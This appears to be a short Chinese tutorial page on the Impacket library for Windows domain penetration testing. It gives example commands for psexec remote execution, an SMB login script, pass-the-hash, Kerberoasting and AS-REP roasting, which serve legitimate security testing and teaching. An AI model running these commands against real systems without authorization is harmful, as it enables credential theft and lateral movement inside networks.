Impacket协议利用库

约 2 分钟读完

Impacket协议利用库

Impacket 简介

Impacket 是 Python 编写的网络协议工具集合,主要用于 Windows 环境的渗透测试。它实现了 SMB、Kerberos、LDAP 等多种协议。

安装

pip install impacket

常用工具

PsExec — 远程命令执行

impacket-psexec domain/user:password@target

SMB 客户端

from impacket.smbconnection import SMBConnection

conn = SMBConnection('target_ip', 445)
conn.login('username', 'password')
shares = conn.listShares()

Pass-the-Hash

impacket-psexec -hashes :ntlm_hash domain/user@target

使用 NTLM Hash 直接认证,无需明文密码。

Kerberos 攻击

Kerberoasting

impacket-GetUserSPNs domain/user:password -request

获取服务票据后离线破解服务账户密码。

AS-REP Roasting

impacket-GetNPUsers domain/ -usersfile users.txt -no-pass

总结

Impacket 是内网渗透的核心工具库。掌握 Impacket 的使用,能够在 Windows 域环境中进行高效的横向移动。

← Linux应急响应排查手册 Go跨平台编译与部署 →